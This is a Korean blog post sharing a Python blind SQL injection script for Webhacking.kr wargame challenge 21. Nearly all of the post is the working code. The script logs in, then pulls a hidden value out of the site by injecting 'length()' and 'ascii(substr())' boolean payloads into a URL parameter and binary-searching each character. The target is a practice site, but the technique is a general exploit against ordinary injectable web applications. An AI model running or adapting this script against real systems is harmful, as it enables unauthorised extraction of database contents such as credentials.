Blind SQL Injection Tool by Python ( Webhacking.kr 21번을 위한 )

2015. 9. 22. 09:17

파이썬으로 제작되어 있고, 급하게 만든거라 주석은 하나도 없음 .

참고용으로만 사용

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
import requests
import sys
​
def main():
    if len(sys.argv) != 4:
        print("useage : {Path} (url) (id) (pw) (param)".format(Path=sys.argv[0]))
        return
    id = str(sys.argv[1])
    pw = str(sys.argv[2])
    param = str(sys.argv[3])
    query(login(id,pw),param)
​
def login(id, pw):
    form = {'id':id,'pw':pw}
    a = requests.post('http://webhacking.kr', data=form)
    if(a.text.find("===========================================") != -1):
        print("Login Fail !")
        exit()
    cookie = a.headers.get('set-cookie')
    print('id : '+form['id']+'\tLogin Success !');
    max = cookie.index('=',0)
    cookies = {cookie[0:max]:cookie[max+1:]}
    return cookies
​
​
def query(cookie, param):
    result = ''
    url = "http://webhacking.kr/challenge/bonus/bonus-1/index.php?no=2{query}&id=admin&pw"
    querys = " and length({p})={0}"
    length =0
    print("글자 수 : ", end='')
    for i in range(1,60):
        query = url.format(query=querys.format(i, p=param))
        h = requests.get(query, cookies=cookie)
        h = h.text.lower()
        if(h.find('true') != -1):
            print(str(i))
            length = i
            break;
    if(length is 0):
        print("글자수 못찾음")
        exit()
    for i in range(1, length+1):
        a_max = 125
        a_min = 34
        mid = 0
        while(a_max > a_min):
            mid = int( (a_max + a_min) / 2 )
            querys =  " and ascii(substr({p},{0},1))>={1}"
            query = url.format(query=querys.format(i,mid,p=param))
            h = requests.get(query, cookies=cookie)
            h = h.text.lower()
            if(h.find('true') != -1):
                a_min = mid
            else :
                a_max = mid
            if a_min == mid and mid+1 == a_max :
                break;
        result += chr(a_min)
        print(chr(a_min),end='')
    print("\nresult : {0}".format(result))
    return
​
if __name__ == '__main__':
        main()
Colored by Color Scripter
cs

저작자표시 비영리 변경금지

'Programing > Example_Code' 카테고리의 다른 글

Reversing.kr - Easy KeygenMe (0)	2015.10.31
Zip Password Cracker ( Webhacking.kr 42번 문제용 ) (0)	2015.09.22
base64 인코딩, 디코딩 툴 ( Webhacking.kr 6번 문제를 위한 ) (0)	2015.09.22
TCP 소켓 통신 서버, 클라이언트 연결 예제 ( C ) (0)	2015.09.13
악성코드 기초 제작 (0)	2015.09.12

Secure Story by 로기리

Blind SQL Injection Tool by Python ( Webhacking.kr 21번을 위한 )

'Programing > Example_Code' 카테고리의 다른 글

+ Recent posts

티스토리툴바